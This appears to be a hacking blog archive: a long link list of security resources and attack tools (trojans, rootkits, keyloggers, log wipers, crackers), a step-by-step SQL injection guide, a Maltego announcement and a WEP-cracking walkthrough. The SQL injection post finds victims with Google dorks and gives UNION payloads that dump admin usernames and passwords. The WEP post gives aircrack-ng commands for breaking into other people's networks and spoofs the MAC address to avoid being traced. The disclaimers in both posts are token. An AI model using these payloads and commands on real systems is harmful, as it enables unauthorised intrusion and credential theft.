Tuesday, August 11, 2015

Hacking Tools and useful informations



A totally HUGE security archive http://neworder.box.sk/
THE best security forums http://www.security-forums.com/
Current and archived exploits http://www.securiteam.com/exploits/
'Underground' search engine http://www.warez.com/
Default login’s for all sorts of devices http://www.governmentsecurity.org
One of the top mainstream security sites http://www.securityfocus.com/
TESO Computer security http://teso.scene.at/
Asian security group, lots of advisories http://www.shadowpenguin.org/
w00w00 Security development http://www.w00w00.org/
USSR a strong security group http://www.ussrback.com/
Good all around security site http://www.packetstormsecurity.nl
Exploits, backdoors, Trojans and more http://www.tlsecurity.net
SANS Security Institute with articles on EVERYTHING http://www.sans.org/
A Fairly immense WWW security FAQ http://www.w3.org/Security/Faq/
Computer Security Encyclopedia http://www.itsecurity.com/
Java Security information http://java.sun.com/security/
Help Net Security http://www.net-security.org/
Security Search Engine http://searchsecurity.techtarget.com/
Free BSD security information http://www.freebsd.org/security/
Netscape security information http://home.netscape.com/security/
Linux security community centre http://www.linuxsecurity.com/
Dutch Security Information Network http://www.dsinet.org/
Network Security Library http://secinf.net/
Infamous happy hacker http://www.happyhacker.org/
A once great site from a white hat hacker http://www.antionline.com/
Infosec papers and articles http://www.infosecwriters.com/
Security/privacy/crypto software archive http://www.wiretapped.net/
ISB - Info Sec Bible http://www.securityflaw.com/bible
Security tool’s Http://foundstone.com/
http://securitystats.com

Privacy and Anonymity

All about privacy http://www.privacy.net
Anonymity, privacy and security http://www.stack.nl/~galactus/remailers/
Free, anonymous web surfing http://www.anonymizer.com/
IDSecure service http://www.idzap.com/
News, information and action http://www.privacy.org/
Sam Spade Tools http://www.samspade.org/t/
International PGP homepage http://www.pgpi.org
Encryptable web-mail http://www.hushmail.com/
Anonymity software http://www.skuz.net/potatoware/
REALLY delete your data http://www.cs.auckland.ac.nz/~pgut001/pubs/
Anonymous access http://www.safeproxy.org/
Web privacy http://www.rewebber.de/
A list of web anonymisers http://mikhed.narod.ru/


Cryptography & Encryption

All about RSA http://www.rsasecurity.com/
Cryptography Archives http://www.kremlinencrypt.com/
Cryptography links http://cryptography.org/freecryp.htm
Cryptography Info http://world.std.com/~franl/crypto/
DriveCrypt http://www.e4m.net/
CCIPS http://www.cybercrime.gov/crypto.html
Cryptography resource http://www.crypto.com/
Bruce Schneier's operation http://www.counterpane.com/
Huge Crypto archive http://www.cryptome.org
A list of Crypto links http://www.security-forums.com/crypto


Source: http://www.darknet.org.uk/

Viruses /Trojans & Firewalls
Trojan archive http://packetstormsecurity.nl/trojans/
Up to date Trojan archive http://www.trojanforge.net/
Fearless, everything Trojan http://www.areyoufearless.com/
A good archive with info on each one http://www.dark-e.com
(I'm a moron)'s official Home Page http://www.(I'm a moron).net/
The BO2k project http://bo2k.sourceforge.net/
Another comprehensive Trojan archive http://www.tlsecurity.net/amt.htm
Home of BackOrifice http://www.cultdeadcow.com/
Huge Trojan removal database http://www.anti-trojan.org/
Excellent Anti-Viral software and Virii Database http://www.sophos.com/
Mcafee's Searchable Virus Information Library http://vil.mcafee.com/
Firewall Guide http://www.firewallguide.com/
Virus Writing
http://vx.netlux.org/lib/static/vdat/tutorial.htm

Nice find Strader
Firewall FAQ http://www.interhack.net/pubs/fwfaq/
Firewall How To http://www.grennan.com/Firewall-HOWTO.html
Squid http://www.squid-cache.org/
Excellent virus news and info http://www.antivirus-online.de/english/
The ULTIMATE IPTables resource http://www.linuxguruz.org/iptables/



Programming

PHP IDE http://www.phpide.de/
Scripts, Source and Books http://www.scriptsearch.com/
Java & Internet Glossary http://www.mindprod.com/jgloss.html
Java homepage http://java.sun.com/
Absolute Java FAQ http://www.javafaq.nu/
Thinking in Java http://www.mindview.net/Books/TIJ/
JavaScript Resource http://www.javascript.com
JavaScripts,tutorials & references http://javascript.internet.com/
MySQL home http://www.mysql.com
PostgreSQL home http://www.postgresql.org/
PHP home page http://www.programmersheaven.com/
PHP from hotscripts http://www.hotscripts.com/PHP/
PHP resource index http://php.resourceindex.com/
PHP FAQ's http://www.faqts.com/
PHP Developer resources http://www.phpbuilder.com/
Building dynamic sites with PHP http://www.phpwizard.net
PHP Developer network http://www.evilwalrus.com/
PHP Tutorials and more http://www.thescripts.com/serversidescripting/php
PHP Resource list http://www.security-forums.com/forum/php
ASPTear http://www.alphasierrapapa.com/IisD...nents/AspTear/
ASP Codes and techniques http://www.asptoday.com/
ASP, HTML, SQL and more http://www.w3schools.com/
Think ASP think... http://www.4guysfromrolla.com/
ASP 101 http://www.asp101.com/
ASP developers site http://haneng.com/
PERL Archive http://www.perlarchive.com/
PERL tutorials http://www.perlmonks.org/index.pl?node=Tutorials
Old school PERL programming http://www.cgi101.com/
Windows programming tools http://www.programmerstools.org/
Python homepage http://www.python.org/
Object Oriented Programming http://www.oopweb.com/
XML 101 http://www.xml101.com
Dev-X XML zone http://www.devx.com/xml/
Programmers Heaven http://www.programmersheaven.com/
Loads of tutorials http://www.echoecho.com
Plenty of Web Development scripts http://www.hotscripts.com
Code for everything http://www.planet-source-code.com/
The definitive Assembly resource http://webster.cs.ucr.edu/ASM
C Course http://www.strath.ac.uk/IT/Docs/Ccourse/
Another good C course http://www.eskimo.com/~scs/cclass/notes/top.html
'Legal' Hacking

Zebulun http://www.cyberarmy.com/zebulun/
Hack me http://loginmatrix.com/hackme/
Try2Hack http://www.try2hack.nl/
Hack3r/Roothack http://roothack.org/
Pull The Plug http://www.pulltheplug.com/

News Groups

A great source of information, discussion and answers to questions
Depending how you put them

alt.hacking.
alt.binaries.hacking.beginner.
alt.computer.security.
alt.security.
alt.os.security.
alt.security.pgp.
alt.security.pgp.patches.
comp.os.linux.security.
comp.os.ms-windows.nt.admin.security.
comp.security.unix.
comp.security.pgp.backdoors.
comp.security.unix.
microsoft.public.security.
microsoft.public.sqlserver.security.
microsoft.public.win2000.security.



Tools

THE ultimate port scanner nmap.
The one and only NT password cracker L0phtcrack.
Get the latest version of john the ripper.
Windows process listener Inzider.
The best packet assembler/analyzer hping.
Hackers swiss army knife netcat.
A tool for network monitoring and data acquisition TCPDump.
The ONLY packet sniffer Ethereal.
An active reconnaissance network security tool Firewalk.
Grep your network traffic NGrep.
NIDS tester from NIDSbench fragrouter.
The best OS fingerprinter Xprobe.
Port mapper fport.
File Integrity checker Tripwire.
Check for rootkits chkrootkit.
OSS instrusion detection Snort.
Security Scanner Nessus.
TCP/IP Toolkit Paketto.


Nice find Strader........

Hackers Manifesto
http://www.infowar.com/forums/showthread.p...=&threadid=1162

"don't do anything illegal"

Pratice:
http://www.scifi.pages.at/hackits/
(Thanks newbie)

http://www.hackerslab.org/eorg/
(thanks newbie)

http://www.learntohack.org/
(thanks newbie)

http://neworder.box.sk/codebox.links.php?key=36581
(Thanks Net Buster)

http://www.hackthissite.org/
(thanks 55)

Programs applications and other need tools

Browsers
Mozilla Firefox 9.1
http://www.mozilla.org/products/firefox/
Opera
http://www.opera.com/
Netscape 7.1
http://channels.netscape.com/ns/browsers/download.jsp

Anti Virus programs Free
Avast
http://www.avast.com/
AVG
http://www.grisoft.com/us/us_dwnl_free.php
Free antivirus listing page
http://www.freebyte.com/antivirus/

Anti Trojan applications
http://www.emsisoft.com/en/software/free/

Firewalls free
Zone labs
http://www.zonelabs.com/store/conte...reeDownload.jsp
Sygate
http://smb.sygate.com/products/spf_standard.htm
Outpost
http://www.agnitum.com/download/
Kerio
http://www.kerio.com/us/kpf_download.html


Test sites for firewall security
Pcflank
http://www.pcflank.com/
Gibson Research Corporation
http://www.grc.com/default.htm


Misc. sites that have been posted over the years
How to read NETSTAT –an
http://www.geocities.com/merijn_bel.../netstatan.html
Dshield Distributed Intrusion Detection System
http://www.dshield.org/index.php
Hackers watch
http://www.hackerwatch.org/
TCP/ IP Ports list
http://www.chebucto.ns.ca/~rakerman/port-table.html
Network Tools
http://lists.gpick.com/pages/Network_Tools.htm
Hacking text files (older stuff but still useful )\
http://www.textfiles.com/hacking/INTERNET/
Beta News
http://www.betanews.com/
GIF works
http://www.gifworks.com/
Secunia Security pages virus alerts and such
http://secunia.com/ multiple_browse...ty_te
st/

Anti spyware apps
Spyware blaster
http://www.javacoolsoftware.com/
Spybot S&D
http://www.pcworld.com/downloads/fi...id,22262,00.asp
Spyware guard
http://www.javacoolsoftware.com/spywareguard.html
Adware
http://www.lavasoftusa.com/software/adaware/



Here are some tools posted by my friend Splabster(thank you for taking the time typing those tools) :



General System & Network Probing:

Sam Spade http://www.samspade.org/ssw
Online tools http://www.network-tools.com
Online tool http://visualroute.visualware.com
Online tool http://www.norid.no/domenenavnbaser/domreg-alpha.html
Nmap http://www.nmap.org
Scanline http://www.foundstone.com
SuperScan http://www.foundstone.com
Icmpenum http://razor.bindview.com/tools/des...num_readme.html
Snscan http://www.foundstone.com
Ethereal http://www.ethereal.com
Ettercap http://ettercap.sourceforge.net
Xprobe2 http://www.sys-security.com/html/projects/X.html
Hping2 http://www.hping.org/
SQLping http://www.sqlsecurity.com/scripts.asp
Amap http://www.thc.org/releases.php
Tcp Traceroute http://michael.toren.net/code/tcptraceroute
VisualRoute http://www.visualware.com/visualroute/index.html

Enumerating & Compromising Windows

Netcat http://www.atstake.com/research/tools/index.html
Zebedee http://www.winton.org.uk/sebedee/
Desproxy http://desproxy.courceforge.net/
Winfo http://ntsecurity.nu/toolbox/winfo
enum http://razor.bindview.com/tools/des...num_readme.html
Ldp LDAP query tool available in the windows 2000 server cd-rom
DumpSec http://www.somarsoft.com/
Userdump http://www.hammerofgod.com/download.htm
NTFSdos http://www.sysinternals.com/ntw2k/freeware/NTFDOS.shtml
Chntpw http://home.eunet.no/~pnordahl/ntpasswd/
PWDump3 http://www.polivec.com/pwdump3.html
Lsadump2 http://razor.bindview.com/tools/index.shtml
PipeUpAdmin http://content.443.ch/pub/security/...peup/W2KPipeUp/
Psexec http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Ettercap address above
Brutus http://www.hoobie.net/brutus/index.html
Hydra http://www.thc.org/releases.php
John http://www.openwall.com/john
VNCcrack http://www.phenoelit.de/fr/tools.html
Cain & Abel http://www.oxid.it/projects.html
ClearLogs http://www.ntsecurity.nu/toolbox/
WinZapper http://www.ntsecurity.nu/toolbox/
SQLdict http://www.ntsecurity.nu/toolbox/sqldict

Enumerating & Compromising UNIX

Netcat
Zebedee
Desproxy
Ettercap
Xscan http://packetstormsecurity.nl/Exploit_Code_Archive/
Xwhatchwin http://www.deter.com/unix/software/xwatchwin.tgz
Xkey http://www.deter.com/unix/software/xkey.c
Xspy http://www.deter.com/unix/software/xspy-1.0c.tgz
YPX http://www.deter.com/unix/software/ypx.sh.gz
Hunt http://lin.fsid.cvut.cz/~kra/index.html#HUNT
John
Brutus
Hydra
VNCcrack
SQLdict
Zap3 http://packetstormsecurity.nl/UNIX/...ion/log-wipers/

Enumerating & Compromising Novell

Pandora http://www.nmrc.org/project/pandora/index.html
On-site Admin http://www.environmental-center.com/freeware/onsite.htm
NCPQuery http://razor.bindview.com/tools/index.shtml

Enumerating & Compromising Wireless

Netstumbler http://www.netstumbler.com
Kismet http://www.kismetwireless.net/download.shtml
kisMac (for mac users) http://www.binaervarianz.de/projekt...ac/download.php
Airsnort http://airsnort.shmoo.com/
Airtraf http://www.elixar.com/index.html
SMAC http://www.klcconsulting.net/smac
Accessories http://www.fab-corp.com

General System & Network Vulnerability Checking

Nessus http://www.nessus.org
SARA http://www-arc.com/products.shtml
Nikto http://www.cirt.net/code/nikto.shtml

System Forensics Tools

Vision http://www.foundstone.com/knowledge...esc/vision.html
ListDLLs http://www.sysinternals.com/ntw2k/f.../listdlls.shtml
Process Explorer http://www.sysinternals.com/ntw2k/f...e/procexp.shtml
Coroner's Toolkit http://porcupine.org/forensics/tct.html
LADS http://www.sysinternals.com/ntw2k/f.../listdlls.shtml
Chkrootkit http://www.chkrootkit.org/
WinHex http://www.winhex.com/winhex/index-m.html
Active @ Undelete http://www.active-undelete.com/

Web Hacking tools

Black Widow http://www.softbytelabs.com/Frames.html
Web Sleuth http://sandsprite.com/Sleuth
Wfetch http://support.microsoft.com/defaul...B;en-us;q284285
Tsql http://www.aspalliance.com/mtgal/source_code/tsql.exe
Spike Proxy http://www.immunitysec.com/spike.html

Remote Command Shell/Remote Access Trojans/Rootkits

(I'm a moron) Trojan http://(I'm a moron).net/
Barok active Trojan http://www.thenewbiesarea.com/trojans.shtml
AckCmd backdoor http://ntsecurity.ni/toolbox/
Tini backdoor http://ntsecurity.ni/toolbox/
Psexec r-shell http://www.sysinternals.com/ntw2k/freeware/psexec.shtml
Rwwwshell r-shell http://www.thc.org/releases/rwwwshell-2.0.pl.gz
LRK5 rootkit http://www.hackersplayground.org/tools.html
Knark 2.4 rootkit http://www.hackersplayground.org/tools.html

Miscellaneous Tools

Fragrouter http://packetstorm.widexs.nl/UNIX/I.../nidsbench.html
Stunnel http://www.stunnel.org
WinRelay http://www.ntsecurity.nu/toolbox/
Fpipe http://www.foundstone.com/resources/freetools.htm
Tight VNC http://www.tightvnc.com
FileGateway http://www.steelbytes.com
Remote Anything http://remote-anything.com/en/ra_index.htm
TinyWeb http://www.ritlabs.com/tinyweb/index.html
IKS 200 key logger http://www.amecisco.com/index.htm
KLogger http://www.ntsecurity.nu/toolbox/
ShowWin http://www.foundstone.com/knowledge/free_tools.html
KEYhatcher http://www.keykatcher.com/howit.htm
Hex Editors http://www.expertcomsoft.com
http://www.winhex.com/winhex/index-m.html

Secure hard disk wiping and deletion
http://www.heidi.ie
http://www.jetico.com
http://www.winhex.com/winhex/index-m.html
Trinux http://trinux.sourceforge.net/
Silk Rope 2K http://www.hackersplayground.org/tools.html
CMOS killer http://www.hackersplayground.org/tools.html
LDAP Browser http://www.softerra.com/products/ldabrowser.php
QTODBC http://gpoulose.home.att.net/Tools/QTADO40_sr.exe

Host Lockdown/Protection/Assessment Tools

Bastille http://www.bastille-linux.org
lpchains http://www.linuxplanet.com/linuxpla...torials/2100/3/
Apache Shell http://ftp.porcupine.org/pub/security/index.html
Titan http://www.fish.com/titan
Tara http://www-arc.com/products.shtml
Tcpwrappers http://www.linuxsecurity.com/docs/colsfaq.html#4.5
URLscan http://www.microsoft.com/technet/security/tools/
IISLockdown http://www.microsoft.com/technet/security/tools/
Tripwire http://www.tripwire.com/
HFNETchk http://www.microsoft.com/technet/security/tools/
MS SQL Lockdown Script http://www.sqlsecurity.com/DesktopD...ndex=4&tabid=12
UNIX/Windows/router assessment tools http://www.cisecurity.org/
Secure Cisco Router Template http://www.cymru.com/Documents/secure-ios-template.html
Secure Cisco Switch Template
http://www.qorbit.net/documents/cat...re-template.pdf
Snort http://www.snort.org
Swatch http://swatch.sourceforge.net
Secure Remote Password http://srp.stanford.edu/
Software Code Review links https://sardonix.org/auditing_Resources.html
Sawmill http://www.sawmill.net/features.html

Wednesday, August 15, 2012

Hacking website using SQL Injection -step by step guid

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:

Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:


* DB servers,

* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:

Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:


SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database
.

Simple Basic Queries for SQL:

Select * from table_name :

this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):

For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.


What is SQL Injection?

SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?


*
ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.

Follow my steps.

Step 1: Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork

http://www.ziddu.com/download/13161874/A...t.zip.html


How to use?

copy one
of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:

site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:


http://www.victimsite.com/index.php?id=2'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!

For eg:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".


For eg:


http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4
 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".


I mean:


http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.

For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:

Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).


For eg:

if the number of columns is 7 ,then the query is as follow:


http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).


Like this:




Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user

Now replace the 3 from the query with "version()"

For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the version as 5.0.1 or 4.3. something like this.


Replace the version() with database() and user() for finding the database,user respectively.


For eg:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--


http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Name

 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:



http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.


if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.


Step 7: Finding the Column Name


Now replace the "group_concat(table_name) with the "group_concat(column_name)"


Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--


Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .


Find MysqlChar() for Tablename:

First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(
columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.

anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"


For eg:


http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.


Enjoy..!!cheers..!!


If the website has members then jock-bot for you. You will have the list of usernames and password.

Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:

Just try with url like:

http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html


Note:

This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing is CRIME

Friday, February 17, 2012

Maltego 3.1 Open source intelligence mining and visualization tool


Maltego – Open source intelligence mining and visualization tool


Although we do not make it a habit to announce third party releases, in Maltego’s case, we happily make an exception. Maltego 3.1 is the new flagship product from the guys at Paterva and offers a range of fantastic new features and enhancements to the already phenomenal product. If you haven’t tried Maltego, you don’t know what you are missing. Some of the new features include:
Completely new graph organisational abilities:
You now have the ability to organise the graph in terms of alignment as well as setting the layout for specific segments of graph as well as the entire graph:
New views, including Bubble View which allows users to sort information on their graph in terms of relevance by either incoming links (how many different bits of information point into a node), outgoing links (how many different links point out from a node) or both, as seen below:
Additionally with the layouts there is also the new Interactive Organic view which improves the speed of graph rendering dramatically by only redrawing relevant parts of the graph that are updated. There is also the ability to lock entities in place in a graph to allow for a more human structured format. Within the entities of the graph you can also merge entities together, add notes, add attachments (either from the web or local) as well as the previous features of adding custom entity types and changing the link properties:
Lastly the investigate tab also offers users the ability to now select all entities on a graph based on their bookmark, the type of entity it is as well as the previous searching capabilities:
Once the Parerva development team get their rest, we should be seeing a Maltego 3.1 CE edition surface…we will keep y’all updated once it does. Head down to the Paterva website now, and see the awesomeness of Maltego!

Tuesday, September 20, 2011

Albertino KeyLogger Tutorial





Thursday, September 1, 2011

Beginners Guide To Hacking Wireless Networks

Beginners Guide To Hacking Wireless Networks






Hacking WEP wifi passwords Basic Entry into a WEP Encrypted Network


This Tutorial explains EVERYTHING in detail So, it is quite long. Enjoy.


1. Getting the right tools
This Tutorial is in Bt3 But Download The Latest Release Bt4.


Download Backtrack 4. It can be found here:


http://www.backtrack-linux.org/downloads/


 I downloaded the Dvd iso and burned it to a Dvd. Insert your BT4 Dvd/usb drive and reboot your computer into BT4. I always load into the 3rd boot option from the boot menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st option so be ready. The 1st option boots too slowly or not at all so always boot from the 2nd or 3rd. Experiment to see what works best for you.


2. Preparing the slave network for attack


Once in BT4, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.
Type:


airmon-ng


You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card.
Now type:


airmon-ng stop ath0


then type:


ifconfig wifi0 down


then:


macchanger --mac 00:11:22:33:44:55 wifi0


then:


airmon-ng start wifi0


What these steps did was to spoof (fake) your mac address so that JUST IN CASE your computeris discovered by someone as you are breaking in, they will not see your REAL mac address. Moving on...
Now it's time to discover some networks to break into.


Type:


airodump-ng ath0


Now you will see a list of wireless networks start to populate. Some will have a better signal than others and it is a good idea to pick one that has a decent signal otherwise it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:


hold down ctrl and type c


This will stop airodump from populating networks and will freeze the screen so that you can see the info that you need.


**Now from here on out, when I tell you to type a command, you need to replace whatever is in parenthesis with what I tell you to from your screen. For example: if i say to type:
-c (channel)
then dont actually type in
-c (channel)
Instead, replace that with whatever the channel number is...so, for example you would type:
-c 6
Can't be much clearer than that...lets continue...


Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.








Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:


airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0


the FILE NAME can be whatever you want. This is simply the place that airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.


**Side Note: if you crack more than one network in the same session, you must have different file names for each one or it won't work. I usually just name them wepkey1, wepkey2, etc.


Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in noob terms all this means is "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password.


Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IV's per second.


3. Actually cracking the WEP password


Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0




This will send some commands to the router that basically cause it to associate with your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" If this happens, then good! You are almost there. Now type:


aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0




This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.


Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Type:


aircrack-ng -b (bssid) (filename)-01.cap


Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.




If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.


Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!


It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.


I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network. :-)


I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.


There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
Hacking WEP wifi passwords
By kumalynx

..........................................................................................................................................................................................Wireless Hacking: Projects for Wi-Fi Enthusiasts: Cut the cord and discover the world of wireless hacks!............Hacking Exposed Wireless

Monday, August 22, 2011

NET Framework Rootkits


